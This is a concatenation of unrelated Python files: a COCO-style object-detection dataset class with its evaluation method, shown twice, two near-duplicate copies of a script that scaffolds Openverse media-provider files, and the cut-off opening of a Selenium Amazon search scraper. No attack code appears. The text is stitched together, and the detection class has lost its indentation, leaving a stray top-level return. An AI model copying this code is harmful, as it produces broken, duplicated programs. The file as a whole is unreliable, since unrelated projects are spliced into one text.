            logger (logging.Logger | str | None): Logger used for printing
                related information during evaluation. Default: None.
            jsonfile_prefix (str | None): The prefix of json files. It includes
                the file path and the prefix of filename, e.g., "a/b/prefix".
                If not specified, a temp file will be created. Default: None.
            classwise (bool): Whether to evaluate the AP for each class.
                Default: True.
            proposal_nums (Sequence[int]): Proposal number used for evaluating
                recalls, such as recall@100, recall@1000.
                Default: (1, 10, 100).
            iou_thrs (Sequence[float], optional): IoU threshold used for
                evaluating recalls/mAPs. If set to a list, the average of all
                IoUs will also be computed. If not specified, [0.50, 0.55,
                0.60, 0.65, 0.70, 0.75, 0.80, 0.85, 0.90, 0.95] will be used.
                Default: None.
            usb_eval (bool): Reserved flag for USB evaluation; currently
                unused (USBeval is always used). Kept for API compatibility.
            area_range_type (str, optional): Type of area range to compute
                scale-wise AP metrics. Default: 'absolute_scale_ap'.

        Returns:
            dict[str, float]: COCO style evaluation metric.
        """
        metrics = metric if isinstance(metric, list) else [metric]
        allowed_metrics = ['bbox', 'segm', 'proposal', 'proposal_fast']
        for metric in metrics:
            if metric not in allowed_metrics:
                raise KeyError(f'metric {metric} is not supported')
        if iou_thrs is None:
            iou_thrs = np.linspace(.5, 0.95, int(np.round((0.95 - .5) / .05)) + 1, endpoint=True)

        result_files, tmp_dir = self.format_results(results, jsonfile_prefix)

        eval_results = OrderedDict()
        cocoGt = self.coco
        for metric in metrics:
            msg = f'Evaluating {metric}...'
            if logger is None:
                msg = '\n' + msg
            print_log(msg, logger=logger)

            if metric == 'proposal_fast':
                ar = self.fast_eval_recall(
                    results, proposal_nums, iou_thrs, logger='silent')
                log_msg = []
                for i, num in enumerate(proposal_nums):
                    eval_results[f'AR@{num}'] = ar[i]
                    log_msg.append(f'\nAR@{num}\t{ar[i]:.4f}')
                log_msg = ''.join(log_msg)
                print_log(log_msg, logger=logger)
                continue

            iou_type = 'bbox' if metric == 'proposal' else metric
            if metric not in result_files:
                raise KeyError(f'{metric} is not in results')
            try:
                predictions = mmcv.load(result_files[metric])
                if iou_type == 'segm':
                    # Refer to https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocotools/coco.py#L331 # noqa
                    # When evaluating mask AP, if the results contain bbox, cocoapi will use the box area instead of the mask area for calculating the instance area. Though the overall AP is not affected, this leads to different small/medium/large mask AP results.
                    for x in predictions:
                        x.pop('bbox')
                    warnings.simplefilter('once')
                    warnings.warn('The key "bbox" is deleted for more accurate mask AP of small/medium/large instances since v2.12.0. This does not change the overall mAP calculation.',
                                  UserWarning)
                cocoDt = cocoGt.loadRes(predictions)
            except IndexError:
                print_log(
                    'The testing results of the whole dataset is empty.',
                    logger=logger,
                    level=logging.ERROR)
                break

            cocoEval = USBeval(cocoGt, cocoDt, iou_type, area_range_type=area_range_type)
            cocoEval.params.catIds = self.cat_ids
            cocoEval.params.imgIds = self.img_ids
            cocoEval.params.maxDets = list(proposal_nums)
            cocoEval.params.iouThrs = iou_thrs

            # Proposals are evaluated class-agnostically; everything else is
            # shared between the two cases (previously duplicated verbatim).
            if metric == 'proposal':
                cocoEval.params.useCats = 0

            cocoEval.evaluate()
            cocoEval.accumulate()
            cocoEval.summarize()
            for key, val in cocoEval.stats.items():
                if key.startswith('mAP'):
                    key = f'{metric}_{key}'
                eval_results[key] = float(f'{val:.4f}')

            if classwise and metric != 'proposal':  # Compute per-category AP
                # Compute per-category AP
                # from https://github.com/facebookresearch/detectron2/
                precisions = cocoEval.eval['precision']
                aps = []
                # precision: (iou, recall, cls, area range, max dets)
                assert len(self.cat_ids) == precisions.shape[2]

                results_per_category = []
                for idx, catId in enumerate(self.cat_ids):
                    # area range index 0: all area ranges
                    # max dets index -1: typically 100 per image
                    nm = self.coco.loadCats(catId)[0]
                    precision = precisions[:, :, idx, 0, -1]
                    precision = precision[precision > -1]
                    if precision.size:
                        ap = np.mean(precision)
                    else:
                        ap = float('nan')
                    aps.append(ap)
                    # BUGFIX: inner quotes must differ from the f-string's
                    # own quotes on Python < 3.12 (was nm['name']).
                    results_per_category.append((f'{nm["name"]}', f'{float(ap):0.4f}'))
                eval_results['AP_per_class'] = aps

                num_columns = min(6, len(results_per_category) * 2)
                results_flatten = list(
                    itertools.chain(*results_per_category))
                headers = ['category', 'AP'] * (num_columns // 2)
                results_2d = itertools.zip_longest(*[
                    results_flatten[i::num_columns]
                    for i in range(num_columns)
                ])
                table_data = [headers]
                table_data += [result for result in results_2d]
                table = AsciiTable(table_data)
                print_log('\n' + table.table, logger=logger)

            try:
                # One-line space-separated summary for easy copy/paste.
                copypastes = []
                coco_metrics = ['mAP', 'mAP_50', 'mAP_75', 'mAP_s', 'mAP_m', 'mAP_l']
                for coco_metric in coco_metrics:
                    copypastes.append(f'{cocoEval.stats[coco_metric]:.4f}')
                mAP_copypaste = ' '.join(copypastes)
                eval_results[f'{metric}_mAP_copypaste'] = mAP_copypaste
            except KeyError:
                pass

        if tmp_dir is not None:
            tmp_dir.cleanup()
        return eval_results
import itertools
import logging
import os.path as osp
import tempfile
import warnings
from collections import OrderedDict
import mmcv
import numpy as np
from mmcv.utils import print_log
from terminaltables import AsciiTable
from mmdet.core import eval_recalls
from .api_wrappers import COCO, COCOeval
from .builder import DATASETS
from .custom import CustomDataset
from .usbeval import USBeval
@DATASETS.register_module()
class CocoDataset(CustomDataset):
CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',
'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush')
def load_annotations(self, ann_file):
"""Load annotation from COCO style annotation file.
Args:
ann_file (str): Path of annotation file.
Returns:
list[dict]: Annotation info from COCO api.
"""
self.coco = COCO(ann_file)
# The order of returned `cat_ids` will not
# change with the order of the CLASSES
self.cat_ids = self.coco.get_cat_ids(cat_names=self.CLASSES)
self.cat2label = {cat_id: i for i, cat_id in enumerate(self.cat_ids)}
self.img_ids = self.coco.get_img_ids()
data_infos = []
total_ann_ids = []
for i in self.img_ids:
info = self.coco.load_imgs([i])[0]
info['filename'] = info['file_name']
data_infos.append(info)
ann_ids = self.coco.get_ann_ids(img_ids=[i])
total_ann_ids.extend(ann_ids)
assert len(set(total_ann_ids)) == len(
total_ann_ids), f"Annotation ids in '{ann_file}' are not unique!"
return data_infos
def get_ann_info(self, idx):
"""Get COCO annotation by index.
Args:
idx (int): Index of data.
Returns:
dict: Annotation info of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return self._parse_ann_info(self.data_infos[idx], ann_info)
def get_cat_ids(self, idx):
"""Get COCO category ids by index.
Args:
idx (int): Index of data.
Returns:
list[int]: All categories in the image of specified index.
"""
img_id = self.data_infos[idx]['id']
ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
ann_info = self.coco.load_anns(ann_ids)
return [ann['category_id'] for ann in ann_info]
def _filter_imgs(self, min_size=32):
"""Filter images too small or without ground truths."""
valid_inds = []
# obtain images that contain annotation
ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
# obtain images that contain annotations of the required categories
ids_in_cat = set()
for i, class_id in enumerate(self.cat_ids):
ids_in_cat |= set(self.coco.cat_img_map[class_id])
# merge the image id sets of the two conditions and use the merged set
# to filter out images if self.filter_empty_gt=True
ids_in_cat &= ids_with_ann
valid_img_ids = []
for i, img_info in enumerate(self.data_infos):
img_id = self.img_ids[i]
if self.filter_empty_gt and img_id not in ids_in_cat:
continue
if min(img_info['width'], img_info['height']) >= min_size:
valid_inds.append(i)
valid_img_ids.append(img_id)
self.img_ids = valid_img_ids
return valid_inds
def _parse_ann_info(self, img_info, ann_info):
"""Parse bbox and mask annotation.
Args:
ann_info (list[dict]): Annotation info of an image.
with_mask (bool): Whether to parse mask annotations.
Returns:
dict: A dict containing the following keys: bboxes, bboxes_ignore,\
labels, masks, seg_map. "masks" are raw annotations and not \
decoded into binary masks.
"""
gt_bboxes = []
gt_labels = []
gt_bboxes_ignore = []
gt_masks_ann = []
for i, ann in enumerate(ann_info):
if ann.get('ignore', False):
continue
x1, y1, w, h = ann['bbox']
inter_w = max(0, min(x1 + w, img_info['width']) - max(x1, 0))
inter_h = max(0, min(y1 + h, img_info['height']) - max(y1, 0))
if inter_w * inter_h == 0:
continue
if ann['area'] <= 0 or w < 1 or h < 1:
continue
if ann['category_id'] not in self.cat_ids:
continue
bbox = [x1, y1, x1 + w, y1 + h]
if ann.get('iscrowd', False):
gt_bboxes_ignore.append(bbox)
else:
gt_bboxes.append(bbox)
gt_labels.append(self.cat2label[ann['category_id']])
gt_masks_ann.append(ann.get('segmentation', None))
if gt_bboxes:
gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
gt_labels = np.array(gt_labels, dtype=np.int64)
else:
gt_bboxes = np.zeros((0, 4), dtype=np.float32)
gt_labels = np.array([], dtype=np.int64)
if gt_bboxes_ignore:
gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
else:
gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
seg_map = img_info['filename'].replace('jpg', 'png')
ann = dict(
bboxes=gt_bboxes,
labels=gt_labels,
bboxes_ignore=gt_bboxes_ignore,
masks=gt_masks_ann,
seg_map=seg_map)
return ann
def xyxy2xywh(self, bbox):
"""Convert ``xyxy`` style bounding boxes to ``xywh`` style for COCO
evaluation.
Args:
bbox (numpy.ndarray): The bounding boxes, shape (4, ), in
``xyxy`` order.
Returns:
list[float]: The converted bounding boxes, in ``xywh`` order.
"""
_bbox = bbox.tolist()
return [
_bbox[0],
_bbox[1],
_bbox[2] - _bbox[0],
_bbox[3] - _bbox[1],
]
def _proposal2json(self, results):
"""Convert proposal results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
bboxes = results[idx]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = 1
json_results.append(data)
return json_results
def _det2json(self, results):
"""Convert detection results to COCO json style."""
json_results = []
for idx in range(len(self)):
img_id = self.img_ids[idx]
result = results[idx]
for label in range(len(result)):
bboxes = result[label]
for i in range(bboxes.shape[0]):
data = dict()
data['image_id'] = img_id
data['bbox'] = self.xyxy2xywh(bboxes[i])
data['score'] = float(bboxes[i][4])
data['category_id'] = self.cat_ids[label]
json_results.append(data)
return json_results
def _segm2json(self, results):
    """Convert instance segmentation results to COCO json style.

    Each ``results[idx]`` is a ``(det, seg)`` pair; returns the bbox and
    segm json lists separately.
    """
    bbox_json_results = []
    segm_json_results = []
    for idx in range(len(self)):
        img_id = self.img_ids[idx]
        det, seg = results[idx]
        for label in range(len(det)):
            # bbox results
            bboxes = det[label]
            for i in range(bboxes.shape[0]):
                data = dict()
                data['image_id'] = img_id
                data['bbox'] = self.xyxy2xywh(bboxes[i])
                data['score'] = float(bboxes[i][4])
                data['category_id'] = self.cat_ids[label]
                bbox_json_results.append(data)
            # segm results
            # some detectors use different scores for bbox and mask
            if isinstance(seg, tuple):
                segms = seg[0][label]
                mask_score = seg[1][label]
            else:
                # Fall back to the bbox confidence as the mask score.
                segms = seg[label]
                mask_score = [bbox[4] for bbox in bboxes]
            for i in range(bboxes.shape[0]):
                data = dict()
                data['image_id'] = img_id
                data['bbox'] = self.xyxy2xywh(bboxes[i])
                data['score'] = float(mask_score[i])
                data['category_id'] = self.cat_ids[label]
                # RLE 'counts' may be bytes; decode so the record is
                # JSON-serializable. NOTE: mutates the caller's results.
                if isinstance(segms[i]['counts'], bytes):
                    segms[i]['counts'] = segms[i]['counts'].decode()
                data['segmentation'] = segms[i]
                segm_json_results.append(data)
    return bbox_json_results, segm_json_results
def results2json(self, results, outfile_prefix):
    """Dump the detection results to a COCO style json file.

    There are 3 types of results: proposals, bbox predictions, mask
    predictions, and they have different data types. This method will
    automatically recognize the type, and dump them to json files.

    Args:
        results (list[list | tuple | ndarray]): Testing results of the
            dataset.
        outfile_prefix (str): The filename prefix of the json files. If the
            prefix is "somepath/xxx", the json files will be named
            "somepath/xxx.bbox.json", "somepath/xxx.segm.json",
            "somepath/xxx.proposal.json".

    Returns:
        dict[str: str]: Possible keys are "bbox", "segm", "proposal", and \
            values are corresponding filenames.
    """
    result_files = dict()
    if isinstance(results[0], list):
        # Per-class bbox lists: one json file serves both 'bbox' and
        # 'proposal' evaluation (deliberately the same path).
        json_results = self._det2json(results)
        result_files['bbox'] = f'{outfile_prefix}.bbox.json'
        result_files['proposal'] = f'{outfile_prefix}.bbox.json'
        mmcv.dump(json_results, result_files['bbox'])
    elif isinstance(results[0], tuple):
        # (det, seg) tuples: bbox and segm results dumped separately.
        json_results = self._segm2json(results)
        result_files['bbox'] = f'{outfile_prefix}.bbox.json'
        result_files['proposal'] = f'{outfile_prefix}.bbox.json'
        result_files['segm'] = f'{outfile_prefix}.segm.json'
        mmcv.dump(json_results[0], result_files['bbox'])
        mmcv.dump(json_results[1], result_files['segm'])
    elif isinstance(results[0], np.ndarray):
        # Raw ndarray per image: class-agnostic proposals.
        json_results = self._proposal2json(results)
        result_files['proposal'] = f'{outfile_prefix}.proposal.json'
        mmcv.dump(json_results, result_files['proposal'])
    else:
        raise TypeError('invalid type of results')
    return result_files
def fast_eval_recall(self, results, proposal_nums, iou_thrs, logger=None):
    """Evaluate proposal recall directly against GT boxes (no json I/O).

    Args:
        results (list[numpy.ndarray]): Per-image proposal arrays.
        proposal_nums (Sequence[int]): Proposal budgets, e.g. (100, 300).
        iou_thrs (Sequence[float]): IoU thresholds for matching.
        logger: Passed through to ``eval_recalls``.

    Returns:
        numpy.ndarray: One average-recall value per proposal budget.
    """
    gt_bboxes = []
    for i in range(len(self.img_ids)):
        ann_ids = self.coco.get_ann_ids(img_ids=self.img_ids[i])
        ann_info = self.coco.load_anns(ann_ids)
        if len(ann_info) == 0:
            gt_bboxes.append(np.zeros((0, 4)))
            continue
        bboxes = []
        for ann in ann_info:
            # Ignored and crowd regions do not count toward recall.
            if ann.get('ignore', False) or ann['iscrowd']:
                continue
            x1, y1, w, h = ann['bbox']
            # COCO stores xywh; convert to xyxy for eval_recalls.
            bboxes.append([x1, y1, x1 + w, y1 + h])
        bboxes = np.array(bboxes, dtype=np.float32)
        if bboxes.shape[0] == 0:
            bboxes = np.zeros((0, 4))
        gt_bboxes.append(bboxes)
    recalls = eval_recalls(
        gt_bboxes, results, proposal_nums, iou_thrs, logger=logger)
    # Mean over axis 1 — presumably the IoU-threshold axis of
    # eval_recalls' output; verify against the mmdet implementation.
    ar = recalls.mean(axis=1)
    return ar
def format_results(self, results, jsonfile_prefix=None, **kwargs):
    """Format the results to json (standard format for COCO evaluation).

    Args:
        results (list[tuple | numpy.ndarray]): Testing results of the
            dataset.
        jsonfile_prefix (str | None): Path-plus-stem prefix for the json
            files, e.g. "a/b/prefix". When None, a temporary directory
            is created instead. Default: None.

    Returns:
        tuple: (result_files, tmp_dir); result_files maps metric names
            to json file paths, tmp_dir is the temporary directory (or
            None when jsonfile_prefix was supplied).
    """
    assert isinstance(results, list), 'results must be a list'
    assert len(results) == len(self), (
        'The length of results is not equal to the dataset len: {} != {}'.
        format(len(results), len(self)))
    tmp_dir = None
    if jsonfile_prefix is None:
        # No destination given: write into a throwaway directory that
        # the caller is expected to clean up via tmp_dir.cleanup().
        tmp_dir = tempfile.TemporaryDirectory()
        jsonfile_prefix = osp.join(tmp_dir.name, 'results')
    result_files = self.results2json(results, jsonfile_prefix)
    return result_files, tmp_dir
def evaluate(self,
             results,
             metric='bbox',
             logger=None,
             jsonfile_prefix=None,
             classwise=True,
             proposal_nums=(1, 10, 100),
             iou_thrs=None,
             usb_eval=True,
             area_range_type='absolute_scale_ap'):
    """Evaluation in COCO protocol.

    Args:
        results (list[list | tuple]): Testing results of the dataset.
        metric (str | list[str]): Metrics to be evaluated. Options are
            'bbox', 'segm', 'proposal', 'proposal_fast'.
        logger (logging.Logger | str | None): Logger used for printing
            related information during evaluation. Default: None.
        jsonfile_prefix (str | None): The prefix of json files. It includes
            the file path and the prefix of filename, e.g., "a/b/prefix".
            If not specified, a temp file will be created. Default: None.
        classwise (bool): Whether to evaluating the AP for each class.
            Default: True.
        proposal_nums (Sequence[int]): Proposal number used for evaluating
            recalls, such as recall@100, recall@1000.
            Default: (1, 10, 100).
        iou_thrs (Sequence[float], optional): IoU threshold used for
            evaluating recalls/mAPs. If set to a list, the average of all
            IoUs will also be computed. If not specified, [0.50, 0.55,
            0.60, 0.65, 0.70, 0.75, 0.80, 0.85, 0.90, 0.95] will be used.
            Default: None.
        usb_eval (bool): Not referenced in this method — presumably kept
            for interface compatibility; TODO confirm.
        area_range_type (str, optional): Type of area range to compute
            scale-wise AP metrics. Default: 'absolute_scale_ap'.

    Returns:
        dict[str, float]: COCO style evaluation metric.
    """
    metrics = metric if isinstance(metric, list) else [metric]
    allowed_metrics = ['bbox', 'segm', 'proposal', 'proposal_fast']
    for metric in metrics:
        if metric not in allowed_metrics:
            raise KeyError(f'metric {metric} is not supported')
    if iou_thrs is None:
        # Standard COCO threshold grid 0.50:0.05:0.95.
        iou_thrs = np.linspace(.5, 0.95, int(np.round((0.95 - .5) / .05)) + 1, endpoint=True)
    result_files, tmp_dir = self.format_results(results, jsonfile_prefix)
    eval_results = OrderedDict()
    cocoGt = self.coco
    for metric in metrics:
        msg = f'Evaluating {metric}...'
        if logger is None:
            msg = '\n' + msg
        print_log(msg, logger=logger)
        if metric == 'proposal_fast':
            # Fast path works on the raw arrays; no json round-trip.
            ar = self.fast_eval_recall(
                results, proposal_nums, iou_thrs, logger='silent')
            log_msg = []
            for i, num in enumerate(proposal_nums):
                eval_results[f'AR@{num}'] = ar[i]
                log_msg.append(f'\nAR@{num}\t{ar[i]:.4f}')
            log_msg = ''.join(log_msg)
            print_log(log_msg, logger=logger)
            continue
        iou_type = 'bbox' if metric == 'proposal' else metric
        if metric not in result_files:
            raise KeyError(f'{metric} is not in results')
        try:
            predictions = mmcv.load(result_files[metric])
            if iou_type == 'segm':
                # Refer to https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocotools/coco.py#L331 # noqa
                # When evaluating mask AP, if the results contain bbox, cocoapi will use the box area instead of the mask area for calculating the instance area. Though the overall AP is not affected, this leads to different small/medium/large mask AP results.
                for x in predictions:
                    x.pop('bbox')
                warnings.simplefilter('once')
                warnings.warn('The key "bbox" is deleted for more accurate mask AP of small/medium/large instances since v2.12.0. This does not change the overall mAP calculation.',
                              UserWarning)
            cocoDt = cocoGt.loadRes(predictions)
        except IndexError:
            print_log(
                'The testing results of the whole dataset is empty.',
                logger=logger,
                level=logging.ERROR)
            break
        cocoEval = USBeval(cocoGt, cocoDt, iou_type, area_range_type=area_range_type)
        cocoEval.params.catIds = self.cat_ids
        cocoEval.params.imgIds = self.img_ids
        cocoEval.params.maxDets = list(proposal_nums)
        cocoEval.params.iouThrs = iou_thrs
        # NOTE(review): both branches below run the identical
        # evaluate/accumulate/summarize/stats sequence; only useCats
        # differs, so they could be merged. Kept as-is for safety.
        if metric == 'proposal':
            cocoEval.params.useCats = 0
            cocoEval.evaluate()
            cocoEval.accumulate()
            cocoEval.summarize()
            for key, val in cocoEval.stats.items():
                if key.startswith('mAP'):
                    key = f'{metric}_{key}'
                eval_results[key] = float(f'{val:.4f}')
        else:
            cocoEval.evaluate()
            cocoEval.accumulate()
            cocoEval.summarize()
            for key, val in cocoEval.stats.items():
                if key.startswith('mAP'):
                    key = f'{metric}_{key}'
                eval_results[key] = float(f'{val:.4f}')
            if classwise:  # Compute per-category AP
                # Compute per-category AP
                # from https://github.com/facebookresearch/detectron2/
                precisions = cocoEval.eval['precision']
                aps = []
                # precision: (iou, recall, cls, area range, max dets)
                assert len(self.cat_ids) == precisions.shape[2]
                results_per_category = []
                for idx, catId in enumerate(self.cat_ids):
                    # area range index 0: all area ranges
                    # max dets index -1: typically 100 per image
                    nm = self.coco.loadCats(catId)[0]
                    precision = precisions[:, :, idx, 0, -1]
                    precision = precision[precision > -1]
                    if precision.size:
                        ap = np.mean(precision)
                    else:
                        ap = float('nan')
                    aps.append(ap)
                    results_per_category.append((f'{nm["name"]}', f'{float(ap):0.4f}'))
                eval_results['AP_per_class'] = aps
                # Lay the per-class results out as a 2-column-pair table.
                num_columns = min(6, len(results_per_category) * 2)
                results_flatten = list(
                    itertools.chain(*results_per_category))
                headers = ['category', 'AP'] * (num_columns // 2)
                results_2d = itertools.zip_longest(*[
                    results_flatten[i::num_columns]
                    for i in range(num_columns)
                ])
                table_data = [headers]
                table_data += [result for result in results_2d]
                table = AsciiTable(table_data)
                print_log('\n' + table.table, logger=logger)
            try:
                # Space-separated summary convenient for copy/paste.
                copypastes = []
                coco_metrics = ['mAP', 'mAP_50', 'mAP_75', 'mAP_s', 'mAP_m', 'mAP_l']
                for coco_metric in coco_metrics:
                    copypastes.append(f'{cocoEval.stats[coco_metric]:.4f}')
                mAP_copypaste = ' '.join(copypastes)
                eval_results[f'{metric}_mAP_copypaste'] = mAP_copypaste
            except KeyError:
                pass
    if tmp_dir is not None:
        tmp_dir.cleanup()
return eval_results
import argparse
from pathlib import Path
# Source snippets injected into generated provider scripts.
IMAGE_STORE_INIT = "image_store = ImageStore(provider=PROVIDER)"
AUDIO_STORE_INIT = "audio_store = AudioStore(provider=PROVIDER)"
# Directory layout: templates live next to this file; the repo root is
# two levels up, and the project root one level above that.
TEMPLATES_PATH = Path(__file__).parent
REPO_PATH = TEMPLATES_PATH.parents[1]
PROJECT_PATH = REPO_PATH.parent
def _get_filled_template(template_path: Path, provider: str, media_type: str):
    """Return the template text with provider and media placeholders filled."""
    template_string = template_path.read_text(encoding="utf-8")
    # The provider name is substituted in the three casings the
    # templates use.
    script_string = (
        template_string.replace("{provider_title_case}", provider.title())
        .replace("{provider_upper_case}", provider.upper())
        .replace("{provider}", provider.lower())
    )
    if media_type == "audio":
        store_init, store_name = AUDIO_STORE_INIT, "audio_store"
    else:
        # Any media type other than "audio" falls back to the image store.
        store_init, store_name = IMAGE_STORE_INIT, "image_store"
    return (
        script_string.replace("media_store_init", store_init)
        .replace("{media_store}", store_name)
        .replace("{media_type}", media_type)
    )
def _render_file(
    target: Path,
    template_path: Path,
    provider: str,
    media_type: str,
    name: str,
):
    """Fill ``template_path`` for the provider and write it to ``target``.

    Args:
        target: Destination file to (over)write.
        template_path: Template file to fill in.
        provider: Provider name used for placeholder substitution.
        media_type: "image" or "audio".
        name: Short label printed alongside the written path.
    """
    with target.open("w", encoding="utf-8") as target_file:
        filled_template = _get_filled_template(template_path, provider, media_type)
        target_file.write(filled_template)
    # Build the label separately and single-quote the inner ':' so the
    # f-string parses on Python < 3.12 (quote reuse is PEP 701, 3.12+).
    label = f"{name + ':':<18}"
    print(f"{label} {target.relative_to(PROJECT_PATH)}")
def fill_template(provider, media_type):
    """Create the API script, Airflow DAG, and test file for a provider.

    Args:
        provider: Provider display name, e.g. "Wikimedia".
        media_type: "image" or "audio".
    """
    print(f"Creating files in {REPO_PATH}")
    dags_path = TEMPLATES_PATH.parent / "dags"
    api_path = dags_path / "provider_api_scripts"
    # "Provider Name" -> "provider_name"; this stem was computed but not
    # used before — the generated paths contained a literal placeholder.
    filename = provider.replace(" ", "_").lower()
    # Render the API file itself
    script_template_path = TEMPLATES_PATH / "template_provider.py_template"
    api_script_path = api_path / f"{filename}.py"
    _render_file(
        api_script_path, script_template_path, provider, media_type, "API script"
    )
    # Render the DAG workflow
    workflow_template_path = TEMPLATES_PATH / "workflow.py_template"
    workflow_path = dags_path / f"{filename}_workflow.py"
    _render_file(
        workflow_path,
        workflow_template_path,
        provider,
        media_type,
        "Airflow DAG",
    )
    # Render the tests
    script_template_path = TEMPLATES_PATH / "template_test.py_template"
    tests_path = REPO_PATH / "tests"
    # Mirror the directory structure, but under the "tests" top level directory
    test_script_path = tests_path.joinpath(*api_path.parts[-2:]) / f"test_{filename}.py"
    _render_file(
        test_script_path, script_template_path, provider, media_type, "API script test"
    )
    print(
        """
NOTE: You will also need to add the Airflow workflow file to the WORKFLOWS list in the \
DAG parsing test file (openverse-catalog/tests/dags/test_dag_parsing.py).
"""
    )
def main():
    """Parse CLI arguments and generate the provider scaffolding."""
    parser = argparse.ArgumentParser(
        description="Create a new provider API script",
        add_help=True,
    )
    parser.add_argument(
        "provider", help='Create the script for this provider (eg. "Wikimedia").'
    )
    parser.add_argument(
        "-m",
        "--media",
        type=str,
        choices=["image", "audio"],
        help="Script will collect media of this type"
        " ('audio'/'image'). Default value is 'image'",
    )
    args = parser.parse_args()
    media_type = args.media
    # argparse leaves --media as None when omitted; fall back to images.
    if media_type not in ["audio", "image"]:
        print("No media type given, assuming it's `image`")
        media_type = "image"
    fill_template(args.provider, media_type)


if __name__ == "__main__":
    main()
import argparse
from pathlib import Path
# Source snippets injected into generated provider scripts.
IMAGE_STORE_INIT = "image_store = ImageStore(provider=PROVIDER)"
AUDIO_STORE_INIT = "audio_store = AudioStore(provider=PROVIDER)"
# Directory layout: templates live next to this file; the repo root is
# two levels up, and the project root one level above that.
TEMPLATES_PATH = Path(__file__).parent
REPO_PATH = TEMPLATES_PATH.parents[1]
PROJECT_PATH = REPO_PATH.parent
def _get_filled_template(template_path: Path, provider: str, media_type: str):
    """Return the template text with provider and media placeholders filled."""
    template_string = template_path.read_text(encoding="utf-8")
    # The provider name is substituted in the three casings the
    # templates use.
    script_string = (
        template_string.replace("{provider_title_case}", provider.title())
        .replace("{provider_upper_case}", provider.upper())
        .replace("{provider}", provider.lower())
    )
    if media_type == "audio":
        store_init, store_name = AUDIO_STORE_INIT, "audio_store"
    else:
        # Any media type other than "audio" falls back to the image store.
        store_init, store_name = IMAGE_STORE_INIT, "image_store"
    return (
        script_string.replace("media_store_init", store_init)
        .replace("{media_store}", store_name)
        .replace("{media_type}", media_type)
    )
def _render_file(
    target: Path,
    template_path: Path,
    provider: str,
    media_type: str,
    name: str,
):
    """Fill ``template_path`` for the provider and write it to ``target``.

    ``name`` is a short label printed next to the written file's path.
    """
    with target.open("w", encoding="utf-8") as target_file:
        filled_template = _get_filled_template(template_path, provider, media_type)
        target_file.write(filled_template)
    print(f"{name + ':':<18} {target.relative_to(PROJECT_PATH)}")
def fill_template(provider, media_type):
    """Create the API script, Airflow DAG, and test file for a provider.

    Args:
        provider: Provider display name, e.g. "Wikimedia".
        media_type: "image" or "audio".
    """
    print(f"Creating files in {REPO_PATH}")
    dags_path = TEMPLATES_PATH.parent / "dags"
    api_path = dags_path / "provider_api_scripts"
    # "Provider Name" -> "provider_name"; this stem was computed but not
    # used before — the generated paths contained a literal placeholder.
    filename = provider.replace(" ", "_").lower()
    # Render the API file itself
    script_template_path = TEMPLATES_PATH / "template_provider.py_template"
    api_script_path = api_path / f"{filename}.py"
    _render_file(
        api_script_path, script_template_path, provider, media_type, "API script"
    )
    # Render the DAG workflow
    workflow_template_path = TEMPLATES_PATH / "workflow.py_template"
    workflow_path = dags_path / f"{filename}_workflow.py"
    _render_file(
        workflow_path,
        workflow_template_path,
        provider,
        media_type,
        "Airflow DAG",
    )
    # Render the tests
    script_template_path = TEMPLATES_PATH / "template_test.py_template"
    tests_path = REPO_PATH / "tests"
    # Mirror the directory structure, but under the "tests" top level directory
    test_script_path = tests_path.joinpath(*api_path.parts[-2:]) / f"test_{filename}.py"
    _render_file(
        test_script_path, script_template_path, provider, media_type, "API script test"
    )
    print(
        """
NOTE: You will also need to add the Airflow workflow file to the WORKFLOWS list in the \
DAG parsing test file (openverse-catalog/tests/dags/test_dag_parsing.py).
"""
    )
def main():
    """CLI entry point: parse arguments and scaffold a new provider."""
    parser = argparse.ArgumentParser(
        description="Create a new provider API script",
        add_help=True,
    )
    parser.add_argument(
        "provider", help='Create the script for this provider (eg. "Wikimedia").'
    )
    parser.add_argument(
        "-m",
        "--media",
        type=str,
        choices=["image", "audio"],
        help="Script will collect media of this type"
        " ('audio'/'image'). Default value is 'image'",
    )
    args = parser.parse_args()
    provider = args.provider
    media_type = args.media
    # --media has no argparse default, so None means it was omitted;
    # fall back to "image".
    if media_type not in ["audio", "image"]:
        print("No media type given, assuming it's `image`")
        media_type = "image"
    fill_template(provider, media_type)


if __name__ == "__main__":
    main()
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
import json
from datetime import datetime
from jsonReport import GeneratejsonReport
class AmazonAPI:
    """Scrape Amazon search results for a term within a price range.

    Drives a local chromedriver, collects product links from the result
    page, and extracts title/seller/price for each product.
    """

    def __init__(self, search_term, filters, base_url, currency):
        """Create the browser session and the price-filter query fragment.

        Args:
            search_term: Product query typed into the search box.
            filters: Dict with 'min' and 'max' price bounds (whole units).
            base_url: Storefront root, e.g. "http://www.amazon.in/".
            currency: Currency symbol used to locate prices on the page.
        """
        self.base_url = base_url
        self.search_term = search_term
        options = webdriver.ChromeOptions()
        # set_automation_as_head_less(options)
